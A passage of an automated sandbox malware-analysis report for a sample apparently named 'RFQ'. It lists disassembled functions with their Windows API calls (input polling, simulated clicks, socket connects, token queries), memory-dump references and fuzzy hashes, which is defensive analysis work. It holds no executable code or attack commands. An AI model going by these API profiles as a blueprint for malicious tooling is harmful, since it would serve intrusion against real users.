                                                                                                                                                    APIs
                                                                                                                                                    • GetCursorPos.USER32(000000FF), ref: 0074B64F
                                                                                                                                                    • ScreenToClient.USER32(00000000,000000FF), ref: 0074B66C
                                                                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 0074B691
                                                                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 0074B69F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4210589936-0
                                                                                                                                                    • Opcode ID: d46d2f44789a9b659c76b1c59337ceb70fb1969a9d72fdae75abbe24765bbe87
                                                                                                                                                    • Instruction ID: ba2d3b9a32c3e6d545b8277f231ae953ff5fe7739e288b26d7c9b898a83dee3b
                                                                                                                                                    • Opcode Fuzzy Hash: d46d2f44789a9b659c76b1c59337ceb70fb1969a9d72fdae75abbe24765bbe87
                                                                                                                                                    • Instruction Fuzzy Hash: AF415035504115FFDF259F64C844AEABB74FB46364F104319F82A96290CB38AD54DF92
                                                                                                                                                    Function 0076B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0076B369
                                                                                                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 0076B413
                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0076B41B
                                                                                                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 0076B429
                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0076B431
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3382505437-0
                                                                                                                                                    • Opcode ID: 56bdd0dd9645eb201251e19b8aee691ad78c676e102bd6e3d652fd633933b227
                                                                                                                                                    • Instruction ID: 0b7e119e461ae74174bc0dd8705a2647f04576eab2dd5ca12a43fa05885d5010
                                                                                                                                                    • Opcode Fuzzy Hash: 56bdd0dd9645eb201251e19b8aee691ad78c676e102bd6e3d652fd633933b227
                                                                                                                                                    • Instruction Fuzzy Hash: 2231AD71900219EBDF14CF68D949A9E3BB5EB05319F108229FC22EA2D1D7B89D54CB90
                                                                                                                                                    Function 0076DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0076DBD7
                                                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0076DBF4
                                                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0076DC2C
                                                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0076DC52
                                                                                                                                                    • _wcsstr.LIBCMT ref: 0076DC5C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3902887630-0
                                                                                                                                                    • Opcode ID: 617f399857b677abfb29a0452e9547611ba4bb43e1f88a446f24ccfea0bd0a47
                                                                                                                                                    • Instruction ID: 0c23adbb1ffb582217fe60c403dc10cb0d596c8b47b876b53ff896347fdc1d5a
                                                                                                                                                    • Opcode Fuzzy Hash: 617f399857b677abfb29a0452e9547611ba4bb43e1f88a446f24ccfea0bd0a47
                                                                                                                                                    • Instruction Fuzzy Hash: 11210772B14244BFEB355F399C49E7B7BA8DF45750F108039FC0ACA191EAA9CC01D2A0
                                                                                                                                                    Function 0076BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0076BC90
                                                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0076BCC2
                                                                                                                                                    • __itow.LIBCMT ref: 0076BCDA
                                                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0076BD00
                                                                                                                                                    • __itow.LIBCMT ref: 0076BD11
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$__itow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3379773720-0
                                                                                                                                                    • Opcode ID: 447e4b28598eb703436e36f9313f0e779ac927bd0418f7591b9d3c0c9a22bd20
                                                                                                                                                    • Instruction ID: 138c732229f437da8ff9c190b2d0efb2bb3bc596f25f93d07ee9be012bdca9a0
                                                                                                                                                    • Opcode Fuzzy Hash: 447e4b28598eb703436e36f9313f0e779ac927bd0418f7591b9d3c0c9a22bd20
                                                                                                                                                    • Instruction Fuzzy Hash: 4421C975700208BADB20AA658C49FDE7B68AF5A750F004064FD06EF182EB788D4987A1
                                                                                                                                                    Function 00776318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 007350E6: _wcsncpy.LIBCMT ref: 007350FA
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?,007760C3), ref: 00776369
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,007760C3), ref: 00776374
                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,007760C3), ref: 00776388
                                                                                                                                                    • _wcsrchr.LIBCMT ref: 007763AA
                                                                                                                                                      • Part of subcall function 00776318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,007760C3), ref: 007763E0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3633006590-0
                                                                                                                                                    • Opcode ID: a98aa2cb2b540520e8cbb3e1c4e5b987d270d3e36287c247c83fd1c914588001
                                                                                                                                                    • Instruction ID: 7352d70dba7c6da90ab6086530c0837829bc51534cfc65f3897da2dacb5a046a
                                                                                                                                                    • Opcode Fuzzy Hash: a98aa2cb2b540520e8cbb3e1c4e5b987d270d3e36287c247c83fd1c914588001
                                                                                                                                                    • Instruction Fuzzy Hash: 2B21C631504A159BDF25AB789C46FEA23ACAF053E0F108466F449D3189EBAC9984CA55
                                                                                                                                                    Function 00788B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0078A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0078A84E
                                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00788BD3
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00788BE2
                                                                                                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00788BFE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3701255441-0
                                                                                                                                                    • Opcode ID: 6f7c817a085b52c41dc88b13a49e5f09dbf2c041d217e3622579378a6b26a218
                                                                                                                                                    • Instruction ID: 5c2863adab780bbeecf74033aa6873e2004783fbd8274ba2ebdd303aa370e503
                                                                                                                                                    • Opcode Fuzzy Hash: 6f7c817a085b52c41dc88b13a49e5f09dbf2c041d217e3622579378a6b26a218
                                                                                                                                                    • Instruction Fuzzy Hash: 122190312402159FDB10AF68CC89FBE77A9EF48750F048559F916AB292DF78AC018B61
                                                                                                                                                    Function 00788420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsWindow.USER32(00000000), ref: 00788441
                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00788458
                                                                                                                                                    • GetDC.USER32(00000000), ref: 00788494
                                                                                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 007884A0
                                                                                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 007884DB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4156661090-0
                                                                                                                                                    • Opcode ID: 010c7de7d7371f990f261909eb5a4a91b97709716bf1467a0781e0dd91c2e56b
                                                                                                                                                    • Instruction ID: a78aef5936ca5ccc189223fd04168f249b8458146d083971a3fe9249a82bcefd
                                                                                                                                                    • Opcode Fuzzy Hash: 010c7de7d7371f990f261909eb5a4a91b97709716bf1467a0781e0dd91c2e56b
                                                                                                                                                    • Instruction Fuzzy Hash: 88218476A00204EFD710EFA4D889B9EB7E5EF48341F04C579E859D7252DB78AD00CB60
                                                                                                                                                    Function 0074AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0074AFE3
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0074AFF2
                                                                                                                                                    • BeginPath.GDI32(?), ref: 0074B009
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0074B033
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3225163088-0
                                                                                                                                                    • Opcode ID: 903c09dd0d86d5a8ebf652ea339e5802734c5dffd465755db0e867f68fccc61c
                                                                                                                                                    • Instruction ID: c6630ea455a8c6d5a071adc8b9af365db48b77857444b966da51f364bc27ca82
                                                                                                                                                    • Opcode Fuzzy Hash: 903c09dd0d86d5a8ebf652ea339e5802734c5dffd465755db0e867f68fccc61c
                                                                                                                                                    • Instruction Fuzzy Hash: 1E2130B0800209EFDB20DF55EC48BAA7B68B710356F54C31AE421D61A0D77D9C55DB59
                                                                                                                                                    Function 0075217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 007521A9
                                                                                                                                                    • CreateThread.KERNEL32(?,?,007522DF,00000000,?,?), ref: 007521ED
                                                                                                                                                    • GetLastError.KERNEL32 ref: 007521F7
                                                                                                                                                    • _free.LIBCMT ref: 00752200
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 0075220B
                                                                                                                                                      • Part of subcall function 00757C0E: __getptd_noexit.LIBCMT ref: 00757C0E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2664167353-0
                                                                                                                                                    • Opcode ID: 8d8e0cf9c8643e451e3398130594b0e65d8f1d04b09accc86bb5cbc36b1bbcb6
                                                                                                                                                    • Instruction ID: c75923dec362d86df6c80fea02a84108bf0242dc2c15877dfa0308bf6bf03596
                                                                                                                                                    • Opcode Fuzzy Hash: 8d8e0cf9c8643e451e3398130594b0e65d8f1d04b09accc86bb5cbc36b1bbcb6
                                                                                                                                                    • Instruction Fuzzy Hash: ED110877204746EF9B25AF65EC46DEB3798EF02772B100129FD1487142EBF9D80686E0
                                                                                                                                                    Function 0076ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0076ABD7
                                                                                                                                                    • GetLastError.KERNEL32(?,0076A69F,?,?,?), ref: 0076ABE1
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,0076A69F,?,?,?), ref: 0076ABF0
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,0076A69F,?,?,?), ref: 0076ABF7
                                                                                                                                                    • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0076AC0E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 842720411-0
                                                                                                                                                    • Opcode ID: 2a3f7ba3e8dba109bbbd62b699a50826dc0225457a99c8efde54bbdfcf8bada0
                                                                                                                                                    • Instruction ID: c4de1ab1d7ed31b3926487b7e9fb82147124119ca20d6ae26051e90ad2392d0e
                                                                                                                                                    • Opcode Fuzzy Hash: 2a3f7ba3e8dba109bbbd62b699a50826dc0225457a99c8efde54bbdfcf8bada0
                                                                                                                                                    • Instruction Fuzzy Hash: CA018C70200208BFDB214FA9DC48EAB3BADEF8A3947104529F806D3260EA79CC40CF74
                                                                                                                                                    Function 00777A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00777A74
                                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00777A82
                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00777A8A
                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00777A94
                                                                                                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00777AD0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2833360925-0
                                                                                                                                                    • Opcode ID: 06b52787b9e6031d5dea8ea472d688ad7272c82f165052bbc21e7c8e72ac1a2d
                                                                                                                                                    • Instruction ID: 3e61cab3a49d26fdc30b58a32b7cb9a9a50b7a4672f14a73efb21dad04f3fdc8
                                                                                                                                                    • Opcode Fuzzy Hash: 06b52787b9e6031d5dea8ea472d688ad7272c82f165052bbc21e7c8e72ac1a2d
                                                                                                                                                    • Instruction Fuzzy Hash: CF016D75C0461DDBEF14AFE8DC88ADDBB78FB08351F02C155D502B2250EB389A50C7A5
                                                                                                                                                    Function 00769ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CLSIDFromProgID.OLE32 ref: 00769ADC
                                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000), ref: 00769AF7
                                                                                                                                                    • lstrcmpiW.KERNEL32(?,00000000), ref: 00769B05
                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00769B15
                                                                                                                                                    • CLSIDFromString.OLE32(?,?), ref: 00769B21
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3897988419-0
                                                                                                                                                    • Opcode ID: 58454dbc4743d8dd9eabc0a6411a0dead9f39abc5c00657257cddbec20c8adba
                                                                                                                                                    • Instruction ID: 199b589112fb03fb4f05193b32edbfe5a75a152879cd94fc92da1e29cb76afa9
                                                                                                                                                    • Opcode Fuzzy Hash: 58454dbc4743d8dd9eabc0a6411a0dead9f39abc5c00657257cddbec20c8adba
                                                                                                                                                    • Instruction Fuzzy Hash: 60014FB6600215FFDB214F54ED44FAA7AEDEB48762F148025FE0AD2210E778DD449BA0
                                                                                                                                                    Function 0076AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0076AA79
                                                                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0076AA83
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0076AA92
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0076AA99
                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0076AAAF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                    • Opcode ID: 3a30901bdfc45bdd3da2ad85ece4c01c272692d1ce3c765371709568dae4dcdb
                                                                                                                                                    • Instruction ID: fbedf96468cf15a2ef0c1f58f8b97b13bea4e5dae878aaa70871110468e952e4
                                                                                                                                                    • Opcode Fuzzy Hash: 3a30901bdfc45bdd3da2ad85ece4c01c272692d1ce3c765371709568dae4dcdb
                                                                                                                                                    • Instruction Fuzzy Hash: E0F04F71200309BFEB215FE4AC89F773BACFF49754F00852AF942D7190EA689C41CA61
                                                                                                                                                    Function 0076AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0076AADA
                                                                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0076AAE4
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0076AAF3
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0076AAFA
